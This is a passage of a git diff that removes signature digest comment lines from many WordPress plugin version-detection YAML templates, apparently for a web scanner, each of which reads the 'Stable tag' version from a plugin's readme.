490a0046304402207e72baefdc21360e1c727e9912a5560abbd45f65a48586c0995aa13fe8720008022053906610511a39d3ab476b6d4b0b0ea085d8f19657f27e56b3933f111d03f2e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 12ba6ea72a..c984479bde 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a2e220dadab75ca56250423357fb28228696421df601f8cdd9c41ac4918dd6ec0220211686b133e1ba0b61794ad682fbd51500a70fd5ca6ed596f610201b738a109f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index fe48476550..a3870175c7 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022017e742c7125f4e530302578b6f9008547e274e1247448c72352561433b8bae1f022100a1c5db93ae7d9ef2f2492e9598d68898dc34b603ac4890fbeda3d7da2e3f8c3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index e172b25317..f5f3818ea2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c3a8d06708e4779fa04e3122480e7733957436e3ef912225af741191f6434963022032271bd6e6ae8a57a47108403cb114f73f828e027120600a8a5b4ce22eadb5b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index a8a2534f69..7e5b54c12c 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022016f1e8a8e7bfa27404655073880a91535d35cd9cd4f120c2fb50762809f57dab0221009628bfa0a7804b25bf2740399b6a57a15f20d416a5e31e6b064c8b2599a26381:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 2c382fe922..59effd09f6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eea30c5e2d372a45905121d1397b38adb7d0a7f0982996c8b492c5b1fd7f5af002203dd2bf76883dd41ec20b617c74370020014013cca19754efd68888f12983ad73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index f6068a5a39..833207dcff 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009a721a748dec3cb189dd1c8b409339aec87a00b15b3c069a8a505bd02e993f13022100cc4cc4c153fe551cef5d6313b92bea7472e37be68637cae0c0292b9655715ade:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index f2b79c186a..b7ea2d38d1 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210098181c08941bd8ad4247b9b4c32ad04b61bd4b71dadf164a94aa8f10a858813a022067b117788915718cb4a37ae68999a114548c7c9513355fabcf9a7ac16a3d3802:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index ef0b86899f..2131dbe751 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b8b5e58e8caf38be8445341c6c08487a77f136da60d59c5ebf9fe8457c1fd222022100cdf24d7b2e6838058d3bb619802fbc9673aec925f45bbaff69ed52ef1c72d787:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index d9d7862473..73d644c5e4 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022079b9363108db9cb5fafe22adbd418c6e415e79f5733a5f3f403c7c4ac9c1724e0221009351fab80b2e98dbd64df962eecd64b076ddeb5895e965054bb49befa24bbbae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index d16447f8bd..7b0593dcb7 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f47fd2f7785bf7066283f3acc7e97a858ebe09d07a017c6dbdc7028f13b99949022100cf0ce81dac8663ed086e2062e11a1d1e3974d134665ef4b5abecb984a4226398:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index f65342b2ae..6f65d087e4 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203e3fef602f1440f42cdd4881832e2fda4092c09976e3acb8491f372eb4310e38022001b789bd6c63171818753a53bb96b3af42fc2ffb24ea32e95e4da79f1871baff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index e1ceb1eeeb..783cdd283d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bda966e2f74559d0645c504021b0f47d3d01bf97bbbb35cbe5d298c29c4e968f02206f4f9bb307ff4a187b10165d68e452ee46e8a28bcde0d9312a4c80e5a3c8ed33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index f385af75b2..05121854b3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022041db9392026455be1d7ba8bb8e558e78b6765693982c20269d187a7d5435127a022100a4412e1cdcb0caba5d7e3ed32f4bc9f625b7fa819a42b08986783cfdb3e838b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index d55320da3c..72f52edcd4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a3774e3651f2b0bb2797946add601ab969f49fdde41e587d0bdcf550597c1437022100bfa3f14a76c4fff836a01fa0639297894459a6e019e5c5b16a35dc0e0cc68fd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 1b9e456bec..4cf45ebd74 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100be5877ff1833524246b20116d568e0a4f856cf36a1c1c0c845eceb1cdc851c41022100b8afba9fa19b3f95384cdc6624a3c6e4dfd26725e16348a9cc59bfd38c4299a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 231e8a0331..3d6863e074 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b9fd797e55a6779db63351cefe1a9766011e49f49d352f065a7bc4140da0157c02202433ad11f380997a3de5e2ecec111dbdf6ba31763c447f988e1f6a740d1dd9af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 73838c59fb..79e2813c5e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204e6f814576d996edbdc93820332afb882e7bcecda634b6bc761ad3206c877e3e022100979f02c77cab178d0b3c0840ca33320329bc916e4e2716470c64f1a902acd2f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index f790e3855d..ab9a0f1ae3 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220342561b9c90ae564534028145058258bc286720e13e2208d6e4550655af0f21e022100d9409774e1cb7a99066406e96f73d6f0ea77e7b6fdf2e2999ffedd0e55f24d70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 245f2db21c..5d3adf7c27 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207036bdc949e6e7fd961d4bd1c93170bdc8fd25fbe3edacef8005369a31ebe7dd0220071f780f263d017649cd550762f7b9bdb76ccf0bf8567c0f72b9a8db66d2f95c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index e0039c284d..eda1d27f04 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ec42e1a0b5ce81a038e98d7edea577f5b262b00805e86581841fb3937b3b4e9d022100b5a3779aeab5916e636762b528b3f940c0815c63d0df611e7b3f7d562aac9c82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index f1e145e3cd..16dfc8df5f 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201152539a2828be423e391471184e7c6d6a54c2a6c204fadf68a6257d55c5dc8c0221009d3fe22ce4e1006258105bb29088fee8d0212b93289c95c79185b3203f128286:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index c1ccff22ab..4b7600ea69 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022005058ca82ea5e0f4468161812de0fe3857e93d8b5b7f0e294009a13ce54fca7602203fc441deeba8d222db2b22401384196befada08c36e4e6abac9760c12f2f6e85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index ff5652bac4..2ccd4dbce8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022025000ab0fff649e3fbdf51bf18a1188300833b881c9ebdf9c24f59a24812574d022100ef961783c5b562970cf5961f173a07c29fd53012d2808b29ddf67e75e09b90c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 00a83df8d4..02ceb224d1 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100872d5af466f6bcd56c9987cc3c4c734edde334716c6b6c992fc10106470801f102202c0149996c7169670edd6ef44af83261031b1b209049da6c73df735f40b45dfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 2cce0d90c1..367d587ce2 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206968f09eeefaeb426385add158d93864313625b9ab69b51bf6931f8b0ebd7a04022049c118f7727ec312472645df35205ca66e9059ee6b8a2eb83427562d3d43fa5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 478f4fbc9a..feed730ee0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e76b98aad6db9fd9d746d4dde4820b7c66cbd56bd0f657edf7d46a050161c58e022100e375e7a1c0f3d25e45f1f3842d7e39f7a58fbc92d94d10b9beba3a6b5407997f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 2d725c755c..9b2841e7ca 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220482f91a2850320030ae712c8fde420600d6237811a4a5893940ef0861f23545002207da145acf033c5457e53d4c75addc71216f4d652a1277dc7bb628ae6a44bba0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 6debae1cf1..42be14c5df 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203f0daca2ac7a89e631b89fea3be3ad922b6305eeba9fd1a4c6d03265ae6ec93c022100929d28ac1d120aeba680560a2c133679c649b98248b630826a3f161815cce554:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 0dff8a5606..4e0cd86c3f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e120233c3585ec5fbe280b3bf0fc92cfd7cfcb44d2d00ae3e0d3a02a0ff7c9d7022100eed72fd3074c2115bed8755953cbf8a20f22e09ea96a448a3b40112d2364ec36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 4a0e24ad7b..59eadc5e6e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e91883da47f7b783eed4b2cc14a58f15ab7714764a292fc1cdc057640edbcf0602210092612014c1ee199648d23028aa6f92c0c34ceeda02900e65e46a4b50cd86ba9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 0af454195e..41f7a0075e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dcc43d88643f8c9d614a760bf1919c479b3f69a2179d492288faefb795bdd22402210096c9168aa1c5c0773bd4b758cec36d4fbffcbc2cbbb014cd06009b6e14751d3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 148f97cd5e..7e35a3fb4f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f370f8f7cf88c50ee2acc5188cdf10ca4891a0a20c1b7d60753dc3ee4bfa462e022100e3a44b31f0fd4bfb3675a312d5bc0b11e6e8f90c0d2d956a426a97ac66c51a17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index bb11fec137..18c2a7586e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206edb9723c6736bad572e1c5360615a93320e691413e9515b391edb45973eddb6022000f0e03f549876c3f36efa4b7f20f8d81d858aa7ab11246a6ef236d4f5b71ffe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 9eb1bbd251..6bc2aa78f9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a3e9ecf3d5cc2438b711a2d55747bd18ca4d10dcaefad2123a5e1e0febcaa1d902210091d4e2b992635058d2bc52a49d13a39aa68cc0f9e3770b183579c8e01e0e8028:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 055d739945..a43d3352a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008df0b9637988b2ab8f8d98d23ee5f15e8970140d0bcf23e6150912a6ff76d533022100e3f8e930a97a4290cc007582db84e8459b4bdfe2777524854c6dce582068c8e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 3a45c0b193..e7db9944e4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022021626dcf6f52ef9e814ee61767b5baf01dee0eabd067f8f48d1bab2afe1c20ed022100d7895237b2a47affc4115b4bb4f0705dc2e9ea973bddec578296120ed7ed671b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index aed4a934ee..268bd7b9df 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100966c15190ba008645b9019526dbdd9df09ccc78c3d64529f1a022ce38eafc826022100c2c4809e823459bba3778383b01632d2762355d55cfb8fbc0b4b6b7ef3be6dc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 3250ef47d9..d7fb2209d1 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207dcad544fd9dc7d1663df4fbf9c120830b8d4a1161786308a7187da17b3e7ea5022100932cf6ae9074472c3da6da92b46247f39e0a1c4ab6780ef431ddedada2f2c4bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index aff4497532..a1641d4632 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203a92b364b5e52179749c7232e5187811e866afa207a9880725372aab43a64f2e022050a74d7acdd258f6ae794166880d3293d644e5f6a8f0a7f6b99305a885b88f98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index f0a9533e99..3b6542683c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fd95b9d84c84a115f57fd3c640aa52896eb1cc4be9f1e0319ccc5a984df8cc350221008ba18a3eee85b1d8d8925970e6954b331f90f1e03c321f81acf36f11e65d2772:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c50f1dfef6..969c280ee1 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022071b4bedecd6530615826e9c4a9734d2ac6a68749a27edbb22407500fc3b253f0022100904171720044e1b5110d7e5e27127c6736d057e80252e149d0b651fd72bf73b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 0b88e11302..1c97c422e4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022076f0936e725f9b1ea28840a0fa160cecfd8acbfdb18604c2a652d8b14b2e1289022003a25e9f99bbf1751db251cab7d9a70f5058c0102d1075af845a00fee437afb2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index bce45dcf4c..7d861cf06a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206f3a1061169bae8aabf01fadf564f2ef14c69ce62718e5d8bcaadfcd790cea88022100f0bca5c057ae41f26a97782bff34d9419637e1067732acc43aab227370457968:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index de14040cb2..00eb1e2dfc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022077f2c6b329a1829a592c0a921a6be85478cec39f70f91c9d6795ed076583bddf022100c7f2fbde20826fee9aa6308af2951876368f2f1f16ac42da8408129207d19da5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index e31a857cf9..f089ee37d3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fc4c408d0c470f2c0584675823601449e09ad8dc8a4e3f2a0ba5ed97d9b4582202207965b6406523598b55adb0d9660523afa68badbb2b847f215caca92e8d1563ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 45aa5c5b44..492d66db68 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100df714e2f6fa99d2d355e2e8b28c9e23e40f28ee99192892062df1aeec19e7512022031c4472a3357e6df3eec13baaa1216ee30c1d7877f475abcbbe9ecf090d191b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 1542f01067..f8903fa3db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c4339f08194f73802002eda26605bea1b9e09387a4b017a2e7a2921d281978a20221009f40ed1a260eb57932a0944f9d685261130e5afbf58ca90817d4e246ace0056f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ff09e5c700..ae2451ca38 100644 --- 